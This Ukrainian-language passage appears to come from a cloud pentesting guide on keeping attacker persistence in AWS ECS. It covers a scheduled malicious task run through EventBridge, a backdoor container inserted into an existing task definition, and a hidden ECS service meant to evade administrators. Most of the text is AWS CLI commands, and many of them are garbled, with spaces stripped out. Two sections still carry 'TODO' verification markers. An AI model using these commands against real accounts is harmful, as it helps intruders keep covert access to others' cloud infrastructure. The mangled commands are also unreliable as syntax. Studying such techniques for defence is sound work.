Атакувальник може створити приховану періодичну задачу ECS, використовуючи Amazon EventBridge для розкладання виконання зловмисної задачі періодично. Ця задача може виконувати розвідку, ексфільтрувати дані або забезпечувати постійність в обліковому записі AWS.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
Задній контейнер у наявному ECS визначенні завдання
TODO: Перевірка
Атакуючий може додати прихований задній контейнер у наявне визначення завдання ECS, який працює поруч з легітимними контейнерами. Задній контейнер може бути використаний для постійності та виконання зловмисних дій.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
Недокументований сервіс ECS
TODO: Перевірити
Атакуючий може створити недокументований сервіс ECS, який запускає зловмисне завдання. Встановивши бажану кількість завдань на мінімум та вимкнувши журналювання, адміністраторам стає складніше помітити зловмисний сервіс.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"